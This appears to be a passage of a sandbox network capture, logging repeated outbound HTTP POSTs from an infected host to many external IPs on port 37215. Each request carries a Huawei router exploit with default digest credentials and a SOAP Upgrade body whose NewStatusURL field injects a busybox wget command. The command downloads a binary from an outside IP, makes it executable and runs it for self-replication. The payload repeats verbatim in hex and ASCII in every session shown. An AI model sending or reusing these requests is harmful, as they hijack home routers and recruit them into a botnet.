2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1043192.168.2.1344450157.255.25.20737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.500524998 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1044192.168.2.1354822110.169.163.12437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.500647068 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1045192.168.2.1354804100.227.38.8837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.500665903 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1046192.168.2.135884241.53.169.17237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.500716925 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1047192.168.2.1348318157.69.64.18737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.500724077 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1048192.168.2.1359094197.183.178.14337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.500896931 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1049192.168.2.1340610157.183.67.15337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.501080036 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1050192.168.2.1338538157.199.130.12137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.501111031 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1051192.168.2.1349372197.99.174.8737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.501151085 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1052192.168.2.1351798157.16.10.237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.501172066 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1053192.168.2.1339422157.37.181.18937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.501293898 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
